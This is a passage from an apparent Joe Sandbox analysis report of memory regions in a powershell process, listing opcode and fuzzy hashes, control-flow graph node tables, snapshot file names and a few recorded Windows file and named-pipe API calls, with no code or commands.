                                    • Opcode Fuzzy Hash: 4126f146ebe7c1f18d3efa9c1dd6c70e9aa211ad2aa24e132b25afecd5318948
                                    • Instruction Fuzzy Hash: 5142BE70B002259FDB54DB64C841BA9B7B6EF88304F11C5AAE9097B395DF71AD81CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 09464d50d475428b7c04b3321ef72503acb5a3ec2c3266b79e62930d704855d4
                                    • Instruction ID: 20f73e37662991ce81c3cb04f97381a0f37335bb0bbd9ed66237e36ad66f5db7
                                    • Opcode Fuzzy Hash: 09464d50d475428b7c04b3321ef72503acb5a3ec2c3266b79e62930d704855d4
                                    • Instruction Fuzzy Hash: 8BE1CF70B002259FDB559B64C841BEEB7B6EF89304F01C1AAE5097B395DF74AD81CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad1c95db7162ca0e0e4f1cb13f81e7676a846a016084153e58e3b44f1e96c479
                                    • Instruction ID: 40a8c003ca982b269fc38aafdd5b221ecb91c1b0185d1915ad5f96a869964cea
                                    • Opcode Fuzzy Hash: ad1c95db7162ca0e0e4f1cb13f81e7676a846a016084153e58e3b44f1e96c479
                                    • Instruction Fuzzy Hash: 20A19EB4600201DFE719DF64D9597AEBBF6AF88308F14C569E4129B3A1CB74DC81CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7b4edf0-7b4ee14 3 7b4ee16-7b4ee2b 0->3 4 7b4ee2c-7b4ee42 0->4 7 7b4ee44-7b4ee48 4->7 8 7b4ee7f-7b4ee9b 4->8 9 7b4ee4a-7b4ee53 7->9 10 7b4ee6b 7->10 19 7b4eecc-7b4ef25 8->19 20 7b4ee9d-7b4eecb 8->20 11 7b4ee55-7b4ee58 9->11 12 7b4ee5a-7b4ee67 9->12 13 7b4ee6e-7b4ee7e 10->13 15 7b4ee69 11->15 12->15 15->13 27 7b4f07e-7b4f095 19->27 28 7b4ef2b-7b4ef34 19->28 34 7b4f09c-7b4f0b3 27->34 29 7b4ef36-7b4ef3b 28->29 30 7b4ef43-7b4ef4a 28->30 29->30 31 7b4f0f6-7b4f130 30->31 32 7b4ef50-7b4ef54 30->32 43 7b4f132-7b4f13c 31->43 44 7b4f13e 31->44 32->34 35 7b4ef5a-7b4ef5e 32->35 39 7b4f0ba-7b4f0d1 34->39 38 7b4ef64-7b4ef68 35->38 35->39 40 7b4ef6e-7b4efa3 call 7b4fd60 38->40 41 7b4f0d8-7b4f0ef 38->41 39->41 59 7b4efa9-7b4f043 40->59 41->31 45 7b4f143-7b4f145 43->45 44->45 50 7b4f24f-7b4f266 45->50 51 7b4f14b-7b4f15b 45->51 60 7b4f26d-7b4f327 50->60 52 7b4f167-7b4f172 51->52 53 7b4f15d 51->53 52->60 61 7b4f178-7b4f18a 52->61 53->52 67 7b4f045-7b4f04e 59->67 68 7b4f051-7b4f06f 59->68 97 7b4f32d-7b4f33e 60->97 98 7b4f329 60->98 64 7b4f191-7b4f1a8 61->64 65 7b4f18c 61->65 71 7b4f1de-7b4f1f9 64->71 72 7b4f1aa-7b4f1d6 64->72 65->64 80 7b4f216-7b4f231 71->80 81 7b4f1fb-7b4f1ff 71->81 72->71 87 7b4f233 80->87 88 7b4f23b-7b4f23c 80->88 82 7b4f207-7b4f20f 81->82 83 7b4f201-7b4f204 81->83 82->80 83->82 87->88 88->50 100 7b4f340-7b4f349 97->100 101 7b4f34b-7b4f350 97->101 98->97 100->101 102 7b4f353-7b4f357 100->102 103 7b4f3ae-7b4f3fc 102->103 104 7b4f359-7b4f3ab call 7b411f0 102->104 113 7b4f414-7b4f42a 103->113 114 7b4f3fe-7b4f413 103->114 104->103 120 7b4f467-7b4f483 113->120 121 7b4f42c-7b4f430 113->121 133 7b4f4b4-7b4f50a 120->133 134 7b4f485-7b4f4b3 120->134 122 7b4f432-7b4f43b 121->122 123 7b4f453 121->123 127 7b4f442-7b4f44f 122->127 128 7b4f43d-7b4f440 122->128 124 7b4f456-7b4f466 123->124 129 7b4f451 127->129 128->129 129->124 141 7b4f510-7b4f566 133->141 142 7b4f5c2-7b4f627 133->142 164 7b4f568-7b4f588 141->164 165 7b4f58a-7b4f5a3 141->165 151 7b4f62d 142->151 152 7b4f629-7b4f62b 142->152 153 7b4f630-7b4f684 151->153 152->153 159 7b4f771-7b4f78d 153->159 160 7b4f68a-7b4f699 153->160 167 7b4f69c-7b4f6a0 160->167 164->165 168 7b4f5a5 165->168 169 7b4f5ae 165->169 170 7b4f6a2 167->170 171 7b4f6ac-7b4f6b0 167->171 168->169 169->142 170->171 173 7b4f6b2 171->173 174 7b4f6bc-7b4f6d2 171->174 173->174 178 7b4f744-7b4f752 174->178 179 7b4f6d4-7b4f742 174->179 182 7b4f75c-7b4f76b 178->182 179->182 182->159 182->167
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk$`Jk$`Jk$`Jk$`Jk$`Jk$`Jk
                                    • API String ID: 0-2472493246
                                    • Opcode ID: bf334a26a60a55685fe9f03e7d9ecd564aac15ff10638ca9b171da9ed05b3fa7
                                    • Instruction ID: 8a048be2a72636314ef664ffecae1802b8043d77f4e73b172fe86d02531dd3e4
                                    • Opcode Fuzzy Hash: bf334a26a60a55685fe9f03e7d9ecd564aac15ff10638ca9b171da9ed05b3fa7
                                    • Instruction Fuzzy Hash: D94212B0B042058FDB14DF78D854AAEBBB2FF88314F0485A9D516DB791DB34AC46CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 314 7b45068-7b450a3 318 7b4526e-7b45285 314->318 319 7b450a9-7b450ad 314->319 321 7b4528c-7b452a3 318->321 320 7b450b3-7b450c6 319->320 319->321 328 7b451d1-7b451e0 320->328 329 7b450cc-7b45102 320->329 330 7b452aa-7b4535a call 7b45c5f 321->330 336 7b45175-7b4518d 328->336 347 7b45104-7b4513e 329->347 348 7b4516b-7b4516f 329->348 379 7b45360-7b45384 330->379 345 7b451e2-7b45221 336->345 346 7b4518f-7b451b2 336->346 363 7b45228-7b45267 345->363 362 7b451b4-7b451ce 346->362 346->363 347->348 364 7b45140-7b4515e 347->364 348->330 348->336 363->318 364->348 372 7b45160-7b45168 364->372 372->348
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk$`Jk$`Jk
                                    • API String ID: 0-972079744
                                    • Opcode ID: 63928d168d22a9fd9f4ad81631da412ad1642af836c5636550e5ef944f9f5905
                                    • Instruction ID: 58b50f9d9144ba60939b0e3ee257fb608b1edce3e54d13a51d1bd4f25a2a7c99
                                    • Opcode Fuzzy Hash: 63928d168d22a9fd9f4ad81631da412ad1642af836c5636550e5ef944f9f5905
                                    • Instruction Fuzzy Hash: E281D3B07042049FD724EB78D85566F77A7EFC8314F118528E60ADB391DF389D828BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 384 7b44080 385 7b44085-7b440b0 384->385 387 7b440b2-7b440bc 385->387 388 7b4410f-7b44129 385->388 389 7b44067-7b44074 387->389 390 7b440be-7b440f9 387->390 399 7b44148-7b441a3 call 7b43428 388->399 400 7b4412b-7b44140 call 7b437d8 388->400 389->384 394 7b441a6-7b441af 390->394 395 7b440ff-7b44106 390->395 401 7b441b8-7b441ba 394->401 397 7b44586-7b445aa 395->397 398 7b4410c-7b4410e 395->398 427 7b445b1-7b445e1 397->427 398->388 400->399 404 7b441bc-7b441cc 401->404 405 7b441ce-7b441e9 401->405 414 7b441ff-7b44209 404->414 420 7b441fd 405->420 421 7b441eb-7b441fb 405->421 418 7b44214-7b4421a 414->418 419 7b4420b 414->419 422 7b44220-7b44222 418->422 423 7b444ab-7b444af 418->423 419->418 420->414 421->414 422->423 428 7b44228-7b4422a 422->428 424 7b444c0-7b444c7 423->424 425 7b444b1-7b444be 423->425 429 7b444cd-7b444d7 424->429 430 7b444c9-7b444cb 424->430 435 7b44505-7b44509 425->435 470 7b445e8-7b44618 427->470 432 7b44230-7b44234 428->432 433 7b4449d-7b444a0 428->433 438 7b444df-7b444e3 429->438 430->438 432->427 434 7b4423a-7b44244 432->434 433->435 434->427 440 7b4424a-7b44250 434->440 441 7b44531-7b44547 435->441 442 7b4450b-7b4452b 435->442 443 7b444e5-7b44500 call 7b43428 438->443 444 7b44502 438->444 445 7b44262-7b44271 440->445 446 7b44252-7b4425c 440->446 454 7b44555-7b44583 441->454 455 7b44549-7b4454c 441->455 442->441 453 7b4461f-7b446a0 442->453 443->444 444->435 458 7b44273-7b44277 445->458 459 7b442ca-7b442e0 445->459 446->427 446->445 516 7b44701-7b44704 453->516 517 7b446a2-7b446bf 453->517 455->454 464 7b44296-7b442a5 458->464 465 7b44279-7b4428e call 7b437d8 458->465 462 7b442e6-7b44318 459->462 463 7b44372-7b44379 459->463 493 7b44337-7b4436d call 7b43428 462->493 494 7b4431a-7b4432f call 7b437d8 462->494 468 7b44398-7b443f1 463->468 469 7b4437b-7b44390 call 7b437d8 463->469 464->470 476 7b442ab-7b442c4 464->476 465->464 513 7b44410-7b4442a 468->513 514 7b443f3-7b44408 call 7b437d8 468->514 469->468 470->453 476->459 476->470 493->435 494->493 525 7b44476-7b4448f 513->525 526 7b4442c-7b4443e 513->526 514->513 528 7b44491 525->528 529 7b4449a 525->529 531 7b44440-7b44455 call 7b437d8 526->531 532 7b4445d-7b44474 526->532 528->529 529->433 531->532 532->525 532->526
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk$`Jk
                                    • API String ID: 0-4073607989
                                    • Opcode ID: fef8122b7b77a935bf712384ed75bbf52c5cfd66887f282011172cba6943cd7f
                                    • Instruction ID: f0b111a716198c32aa386adf563e179cd2657f38ea49359388b88293f0be3199
                                    • Opcode Fuzzy Hash: fef8122b7b77a935bf712384ed75bbf52c5cfd66887f282011172cba6943cd7f
                                    • Instruction Fuzzy Hash: A812CEB0B002549FDB14DF68E594AADB7F2EF89310F2540A9E905EB361CB34ED85CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 7b4dda8-7b4ddd8 715 7b4dde6 713->715 716 7b4ddda-7b4dde4 713->716 717 7b4ddeb-7b4dded 715->717 716->717 718 7b4df55-7b4df6c 717->718 719 7b4ddf3-7b4de00 717->719 723 7b4df73-7b4dfb4 718->723 722 7b4de06-7b4de3a 719->722 719->723 740 7b4de72-7b4de85 722->740 741 7b4de3c-7b4de49 722->741 731 7b4dfb6-7b4dfc0 723->731 732 7b4dfc2 723->732 733 7b4dfc7-7b4dfc9 731->733 732->733 735 7b4e020-7b4e07e 733->735 736 7b4dfcb-7b4e01d 733->736 753 7b4e085-7b4e09c 735->753 754 7b4e080 735->754 742 7b4dea5-7b4dea9 740->742 748 7b4de87-7b4de9e 741->748 749 7b4de4b-7b4de53 741->749 744 7b4deb4 742->744 745 7b4deab 742->745 744->718 745->744 748->742 785 7b4de56 call 7b4e640 749->785 786 7b4de56 call 7b4e4d8 749->786 752 7b4de59-7b4de70 752->740 752->741 760 7b4e0bc-7b4e0e7 753->760 761 7b4e09e-7b4e0b4 753->761 754->753 769 7b4e0f3-7b4e11d 760->769 770 7b4e0e9 760->770 761->760 772 7b4e11f 769->772 773 7b4e129-7b4e134 769->773 770->769 772->773 775 7b4e144 773->775 776 7b4e136-7b4e142 773->776 777 7b4e146-7b4e17a 775->777 776->777 782 7b4e184 777->782 783 7b4e17c 777->783 784 7b4e185 782->784 783->782 784->784 785->752 786->752
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk$`Jk
                                    • API String ID: 0-4073607989
                                    • Opcode ID: 92a3a22ee728c219a9914c1f8b3eff1f2a034f4ae956659ee5137236a64097d6
                                    • Instruction ID: cb0b8359604c9d54ad9ca15473481526ec9aa13c6ad9478ae7d199477b11109f
                                    • Opcode Fuzzy Hash: 92a3a22ee728c219a9914c1f8b3eff1f2a034f4ae956659ee5137236a64097d6
                                    • Instruction Fuzzy Hash: C5A100B0B042158FDB14DF68C598AAE7BF2EF88304F1584A9D906EB351DB34EC41CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 842 7b4ec70-7b4ec7f 843 7b4ec81-7b4ecad 842->843 844 7b4ecc8-7b4ecdf 842->844 853 7b4ecb5-7b4ecb7 843->853 854 7b4ecaf-7b4ecb3 843->854 849 7b4ece6-7b4ecfd 844->849 856 7b4ed04-7b4ed49 849->856 853->856 857 7b4ecb9-7b4ecc5 853->857 854->849 854->853 863 7b4ed51-7b4eddd 856->863
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk$`Jk
                                    • API String ID: 0-1831275725
                                    • Opcode ID: 2fda7bb383e970d0ddc342c7b56539be879bc271e1e0ef06dc75d8d7745cf7e5
                                    • Instruction ID: ac03caa043ffab80caa65c96041d85d629806b07aa68c1839c20a7ef6479b5fa
                                    • Opcode Fuzzy Hash: 2fda7bb383e970d0ddc342c7b56539be879bc271e1e0ef06dc75d8d7745cf7e5
                                    • Instruction Fuzzy Hash: 113123B07087044BC724EB38D85465EB7A3EFC4314B468E69C25ACB756DF74BC4487A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 947 7b4c550-7b4c5b7 953 7b4c5bd-7b4c5ec 947->953 954 7b4c6ae-7b4c6ed 947->954 961 7b4c61d-7b4c621 953->961 962 7b4c5ee-7b4c5f1 953->962 957 7b4c70e-7b4c723 954->957 958 7b4c6ef-7b4c70c 954->958 965 7b4cb88-7b4cbca 957->965 958->957 966 7b4c623-7b4c692 961->966 967 7b4c699-7b4c6a8 961->967 964 7b4c5f7-7b4c606 962->964 962->965 973 7b4c611-7b4c61b 964->973 974 7b4c608-7b4c60f 964->974 977 7b4cbcc-7b4cbd6 965->977 978 7b4cbd8 965->978 966->967 967->953 967->954 973->961 973->962 974->961 980 7b4cbdd-7b4cbdf 977->980 978->980 981 7b4cbe5-7b4cbe7 980->981 982 7b4cc6d-7b4cc84 980->982 984 7b4cbed-7b4cbf9 981->984 985 7b4cc8b-7b4ccb9 981->985 982->985 993 7b4cc01-7b4cc04 984->993 997 7b4ccfa-7b4cd1c 985->997 998 7b4ccbb-7b4ccf9 985->998 1018 7b4cc07 call 7b4ce50 993->1018 1019 7b4cc07 call 7b4ce3b 993->1019 996 7b4cc0d-7b4cc0f 999 7b4cc11 996->999 1000 7b4cc33-7b4cc4c 996->1000 998->997 1003 7b4cc1a-7b4cc31 999->1003 1005 7b4cc57 1000->1005 1006 7b4cc4e 1000->1006 1003->999 1003->1000 1005->982 1006->1005 1018->996 1019->996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk
                                    • API String ID: 0-3783921883
                                    • Opcode ID: 923603d0c0205d06f5d34d546ba3ea629f39030fab3f14fd9e1875955c2370a3
                                    • Instruction ID: 9bbc0a92ef15387a3b7f1f6d8219fdbc7b6c4718ecd330a7059e2efecf310bb9
                                    • Opcode Fuzzy Hash: 923603d0c0205d06f5d34d546ba3ea629f39030fab3f14fd9e1875955c2370a3
                                    • Instruction Fuzzy Hash: 8DA1C0B0A05209CFDB14DF74C9946AEBBB2EF89304F1585ADD406EB362DB749C41CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1081 7b4fa88-7b4faae 1083 7b4fab0-7b4faba 1081->1083 1084 7b4fabc 1081->1084 1085 7b4fac1-7b4fac3 1083->1085 1084->1085 1086 7b4fb05-7b4fb1c 1085->1086 1087 7b4fac5-7b4fad8 1085->1087 1094 7b4fb23-7b4fb66 1086->1094 1092 7b4fae8-7b4faf5 1087->1092 1093 7b4fada-7b4fae6 1087->1093 1098 7b4fafe-7b4fb02 1092->1098 1093->1092 1093->1094 1101 7b4fb68-7b4fbb0 1094->1101 1102 7b4fbbb-7b4fbbe 1094->1102 1101->1102
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk$`Jk
                                    • API String ID: 0-3783921883
                                    • Opcode ID: 32a04db46510dbef08108d678a8e75d8ce0b564ba567ddb784a9f4855041d7cd
                                    • Instruction ID: 78c638a3a0ed2579b9c72106636ae4b1be549afd4e5d71a140bfcdad374761f3
                                    • Opcode Fuzzy Hash: 32a04db46510dbef08108d678a8e75d8ce0b564ba567ddb784a9f4855041d7cd
                                    • Instruction Fuzzy Hash: 023136B13093404FD7165B3899682AF7B67DFC5254F0984AEE945CB796CF788C42C3A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: /
                                    • API String ID: 0-2043925204
                                    • Opcode ID: 75185d5152de9c324819fa5696e530ca464be9a8d3aee5ba5838d28ad764bc2e
                                    • Instruction ID: 28eee4de35d2c9b4c9658ea903fcba27a5bc72bebec2a82f6e3fe8b1e77c7a20
                                    • Opcode Fuzzy Hash: 75185d5152de9c324819fa5696e530ca464be9a8d3aee5ba5838d28ad764bc2e
                                    • Instruction Fuzzy Hash: 3F02BDF0B042169BEB04DF69C8446AEB7F2EF89208F1485ADD106DB391DF71DD028BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 079DDFF8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateNamedPipe
                                    • String ID:
                                    • API String ID: 2489174969-0
                                    • Opcode ID: bf4f84ce57489ed1db9c5095f48e71cf5b4d1fb12373ff27baa0086b9968c192
                                    • Instruction ID: 7e5ac035e2e292a1e4c754acc3b8a4c4de921e293c6eca167b2306f28da72abc
                                    • Opcode Fuzzy Hash: bf4f84ce57489ed1db9c5095f48e71cf5b4d1fb12373ff27baa0086b9968c192
                                    • Instruction Fuzzy Hash: 205103B1D00349AFDB10CFA9C988B8EBBF6AF88314F25C02AE508AB251D7745884CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 036d077b0aa30adb8dc15fae9515e9a1343d03359f8d4590c62842ad6fbd7d40
                                    • Instruction ID: e7131f3cb0858b7f2fcf4e697c4fbeef6a36420ddc25bf3e3582b345d8545f64
                                    • Opcode Fuzzy Hash: 036d077b0aa30adb8dc15fae9515e9a1343d03359f8d4590c62842ad6fbd7d40
                                    • Instruction Fuzzy Hash: 6241D1B1A04219AFDB10DFA9C845B9EFBF5FB48714F05C169E608AB381C774A940CBE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,079D63BF,00000000,00000000,00000003,00000000,00000002), ref: 079D64CA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86783844904.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_79d0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: bbee0ade588d244a880e8040c01fd3c35a2dfb26d4d00c4812c67a3bb41a7505
                                    • Instruction ID: a162348a4ab706f3ab399033c3fdd077e7d9309336c1a82e5795600090ff95cc
                                    • Opcode Fuzzy Hash: bbee0ade588d244a880e8040c01fd3c35a2dfb26d4d00c4812c67a3bb41a7505
                                    • Instruction Fuzzy Hash: DF2139B1D0021AAFCB10DF99C948ADEFBF4FB49314F05851AE919A7210C374A954CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 008E5668
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86723151942.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_8e0000_powershell.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 983dfa243409097288136de5c244e13c396095991628f08711551d7f78b71ba8
                                    • Instruction ID: df7d89bd7d42d7d2623c7c1ee56ec975fc929e672576af23335bab334ecb04cc
                                    • Opcode Fuzzy Hash: 983dfa243409097288136de5c244e13c396095991628f08711551d7f78b71ba8
                                    • Instruction Fuzzy Hash: AB2147B1C046599BCB10DFAAD844B9EFBF4FB49724F15812AD919B3210C774A904CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 008E5668
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86723151942.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_8e0000_powershell.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 46ffcdb9656d3fdab60e83a1f9889326bf279ef2da0d4fea910b9ceb140b63b7
                                    • Instruction ID: bed1279405d706ec40fe5f3a790fb97f8f422df48219a3c25f30d6566a04603f
                                    • Opcode Fuzzy Hash: 46ffcdb9656d3fdab60e83a1f9889326bf279ef2da0d4fea910b9ceb140b63b7
                                    • Instruction Fuzzy Hash: 942164B1C046599BCB00CFAAC848A9EFBF4FB49324F00812AD919B3300C774A904CFE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk
                                    • API String ID: 0-1734348141
                                    • Opcode ID: b2b27de61b3c181785cb34c4333f61bbbd4ea252534de268cb3f90a284d938c3
                                    • Instruction ID: d883ccbd87221c6fca73f9dc52fa598adcad15df42ce445fbb0f8611d45303e7
                                    • Opcode Fuzzy Hash: b2b27de61b3c181785cb34c4333f61bbbd4ea252534de268cb3f90a284d938c3
                                    • Instruction Fuzzy Hash: 7751ADB0B002199FDB04DFA4D855ADDBBF2EF88304F1545A8D505AB391CB34AD85CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ?
                                    • API String ID: 0-1684325040
                                    • Opcode ID: 69cb0cbbcb1c99a0de89e983b5d01bbaa0ef5f9725defb47324b51253af247b7
                                    • Instruction ID: 11a18d341773530ff885741d2f5c0a65ea9d48610ebcf55d202551f837f47ccc
                                    • Opcode Fuzzy Hash: 69cb0cbbcb1c99a0de89e983b5d01bbaa0ef5f9725defb47324b51253af247b7
                                    • Instruction Fuzzy Hash: CE31F2B1E002599FDF15CFA4C45469EBBB6BF89300F1481A9F801AB340DBB0ED45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `Jk
                                    • API String ID: 0-1734348141
                                    • Opcode ID: 3c3b466cdfd3ce306b0e06a26b29c4386d2fa712a3b7aa4da831fe8f1f499cf0
                                    • Instruction ID: 33eb59d0057539a7cb65e5d2efbaf6258250c4de9b7e860e26d0f132260785cd
                                    • Opcode Fuzzy Hash: 3c3b466cdfd3ce306b0e06a26b29c4386d2fa712a3b7aa4da831fe8f1f499cf0
                                    • Instruction Fuzzy Hash: 4F31A1B1B052589BEB149FA5C854AAE7BF6EBCE304F1480A9E905A7340DE748D409BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ee4aa3fe3a0bc24d46958c2abcb33f071cc3988be3ed7e9afc0360ceedca413
                                    • Instruction ID: cca01b3c93dc38910fec72ec8789076d16691d6273a810016903b164d9ffc45f
                                    • Opcode Fuzzy Hash: 9ee4aa3fe3a0bc24d46958c2abcb33f071cc3988be3ed7e9afc0360ceedca413
                                    • Instruction Fuzzy Hash: 9DD149B9A00105EFDB11CFA4D994A9E7B7AFF4C340B218269E905AB725CB31EC41DF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.86785666271.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7b40000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d370fb2fed2b71922ff5a3d9361d5c7d22b031b255518ceb564129bca21afeaf
                                    • Instruction ID: 5ffc2880f1743db4bb7a26ea4786194cb660e66efdf4f789d8bd70b4d804d437
                                    • Opcode Fuzzy Hash: d370fb2fed2b71922ff5a3d9361d5c7d22b031b255518ceb564129bca21afeaf
